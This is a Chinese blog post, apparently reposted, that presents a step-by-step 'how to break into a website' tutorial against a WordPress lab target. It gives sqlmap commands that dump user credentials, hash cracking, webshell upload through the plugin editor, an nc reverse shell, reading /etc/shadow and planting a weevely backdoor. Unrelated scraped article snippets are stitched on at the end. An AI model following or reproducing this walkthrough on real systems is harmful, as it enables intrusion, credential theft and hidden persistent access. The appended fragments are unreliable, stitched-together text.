资深hacker带大家如何攻破一个网站!超级详细的教学教程

温馨提示:非法利用网络技术可违反计算机信息破坏罪,切勿利用技术违法犯罪。

话不多说今天带大家实战如何轻松拿站

现在我们获取了网站服务器的IP地址为:173.236.138.113

寻找同一服务器上的其它网站,我们使用sameip.org.

我们需要关于你网站的以下信息:

  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)

让我们开始找你网站的DNS记录,我们用who.is来完成这一目标.

我们发现你的DNS记录如下

让我们来确定web服务器的类型

我们现在已经获取了你的网站域名的注册信息,包括你的重要信息等.

我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.

我们发现你的网站使用了著名的php整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:

1-Find services that run on server(查看服务器上运行的服务)

2-Find server OS(查看操作系统版本)

我们也会用到Backtrack 5 R1中的W3AF 工具:

root@bt:/pentest/web/w3af#./w3af_gui

我们输入要检测的网站地址,选择完整的安全审计选项.

稍等一会,你将会看到扫描结果.

发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

我们通过工具发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.

Using sqlmap with –u url

过一会你会看到

输入N按回车键继续

我们发现你的网站存在mysql显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.

发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名

通过参数“-T wp_users –columns ”来查看wp_users表中的字段.

接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”

我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes

http://www.onlinehashcrack.com/free-hash-reverse.php

登陆wordpress的后台wp-admin

尝试上传php webshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.

Phpwebshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。

我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.

然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.

点击连接我们会看到

接下来我们尝试执行一些命令:

id

uid=48(apache) gid=489(apache) groups=489(apache)

(用来显示用户的id和组)

pwd

/var/www/html/Hackademic_RTB1/wp-content/plugins

(显示服务器上当前的路径)

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

(显示内核版本信息)

执行完成之后我们输入id命令

id

我们发现我们已经是root权限了

uid=0(root) gid=0(root)

现在我们可以查看/etc/shadow文件

cat/etc/shadow

2.用weevely创建一个密码为koko的php后门

root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

接下来上传到服务器之后来使用它

root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

测试我们的hax.php后门

完成,撒花!

原文地址:https://www.cnblogs.com/luchangjiang/p/10463471.html

时间: 2024-10-07 07:39:52

资深hacker带大家如何攻破一个网站!超级详细的教学教程的相关文章

ElegantSnap 一个优雅的,易用的iOS/tvOS/macOS自动布局框架, 超级详细的使用教程,多视图水平等宽/垂直等高排列

ElegantSnap ElegantSnap(Base on SnapKit) to make Auto Layout easy and elegant on both iOS and OS X. 基于SnapKit, 用法简洁优雅,可运行在iOS.tvOS.macOS上自动布局库 Requirements / 使用条件 iOS 10.0+ / Mac OS X 10.12+ / tvOS 10.0+ Xcode 9.0+ Swift 5.0+ Installation / 安装 CocoaP

python 登陆一个网站

今天想用python写一个登陆的脚本,搜了一下,网上挺多的,看了一些后写了个登陆虎扑论坛的脚本. 原理: 只要在发送http请求时,带上含有正常登陆的cookie就可以了. 1.首先我们要先了解cookie的工作原理. Cookie是由服务器端生成,发送给User-Agent(一般是浏览器),浏览器会将Cookie的key/value保存到某个目录下的文本文件内,下次请求同一网站时就发送该Cookie给服务器(前提是浏览器设置为启用cookie).Cookie名称和值可以由服务器端开发自己定义,

如何开发一个网站

希望本篇文章对入门的朋友有所帮助 那么我写这篇文章的目的也就达到了 如何开发一个网站? 开发语言不是问题 今天我们就以php为基础展开. 一.开发环境:我们熟悉的lamp是当前的流行架构 即 LINUX+APACHE+MYSQL+PHP 入门的朋友把主要精力放在php与mysql上即可. 对于php需要掌握的:基础语法 -----> 函数----->正则--------> 数组(数组我想特别强调一下 数组是很常用的很重要一定要打好基础 特别注意多维数组的使    用)--------&g

一个网站的诞生01--缘由

大概在半年前,我觉得需要做一个网站,寻找新奇有趣的餐厅. 喜欢美食的人,在中意餐厅吃久了,总想找新餐厅换换口味,试试新菜和新的食材. 寻找新餐厅并不容易,甚至是艰难.由于众所周知的原因,网上流传的餐厅文,美食文,常常不可信,编排越精美,越可能是软广---大家天天都很忙,很少有闲心做这么精美的文宣.我跟这些美食文找过,失望大于希望,成功率不到一半.而且,魔都太大,打听到的餐厅,总要去试吃一下,来来回回总跑上几个小时吧?时间很宝贵,这么做太不划算了! 上海的餐厅大众点评网收集的最齐全,如果我把它上面

十年建站老司机带你十分钟搭建网站

本文概要: 1. 域名 + 域名注册 + 域名备案 + 域名解析绑定 2. 服务器 + 虚拟主机 + windows服务器 + linux服务器 3. CMS建站系统 4. 总结 在如今互联网发展迅速猛进的大环境下,网站已经成为一个企业不可缺少的网络媒介.但网站开发行业鱼龙混杂,质量参差不齐,价格更是跨越区间大.尤其对于那些在建站方面不懂的小白来说,很容易被人坑,所以作为在网站开发行业摸爬滚打多年的草根老司机,通过本文向大家分享建站的经验与心得,避免不必要的弯路和成本损耗. Come on! 小

怎样查看一个网站是否使用dedecms织梦程序做的

对于一个自己看上的好网站,我们总是迫不及待的想知道它是用什么程序做的.然后自己也可以通过仿站.采集等做一个类似的站点.今天分享点如何判断一个网站是否是使用的织梦DedeCMS程序制作的知识,以后看上哪个站点,直接仿下来就是了.还有一个问题,如果我知道这个网站是织梦DedeCMS制作的,如何判断使用的是织梦DedeCMS的哪个版本呢?织梦DedeCMS网站及其版本的判断一文就来说下这两个问题,不过这些判断只能作为一个参考,不能绝对的肯定哦.首先:我们打开一个网站,想知道它是用什么程序做的,第一点需

做一个网站前期需要有哪些准备工作

首先,制作网站前域名是要有的,域名注册分为以企业或者是个人,如果是个人的话需要提供身份证复印件照片,如果是企业,那一定要有企业营业执照以及信用代码,因为现在不论是企业还是个人名义注册都是要审核的.      域名已经有了,空间也是需要的,不然网站程序是没有地方放的,空间买的话尽量的要买独立ip的,尽量空间买大一点,这样就不必担心有一天网站因为空间不足出现问题了.      如果这个网站是要备案的,那么在买好域名的时候就应该着手准备备案了,当然,备案的话也是需要资料的,我一般是在阿里云备案,所以我

做一个网站需要有哪些流程

首先,制作网站前域名是要有的,域名注册分为以企业或者是个人,如果是个人的话需要提供身份证复印件照片,如果是企业,那一定要有企业营业执照以及信用代码,因为现在不论是企业还是个人名义注册都是要审核的.   域名已经有了,空间也是需要的,不然网站程序是没有地方放的,空间买的话尽量的要买独立ip的,尽量空间买大一点,这样就不必担心有一天网站因为空间不足出现问题了.   如果这个网站是要备案的,那么在买好域名的时候就应该着手准备备案了,当然,备案的话也是需要资料的,我一般是在阿里云备案,所以我给大家说一下

花生棒2代的另类玩法 — 万能的棒子,带我穿越另一个网络吧

花生棒1代我是原价298元买的 ,何止用坑爹来表达我的愤怒 ,3个月后的参活动,花生棒2代只要98元(只有298的零头),而且还赠送了一个品胜电源(在京东要37元). 我们来看看这个所谓的2代和1代到底有什么差异性,从包装上来说除了型号跟一代的不同,其他细节完全一样.花生棒的盒子比较小巧,手掌心这么大,盒子的做工还算不错.打开盒子后,发现多了一个说明书,1代不知道是不是为了耍酷 ,连纸张的说明书都没有,仅仅在盒子的四周印上了快速指南,我从设计者的角度理解,算是一种比较有意思的创新,但这种方式传递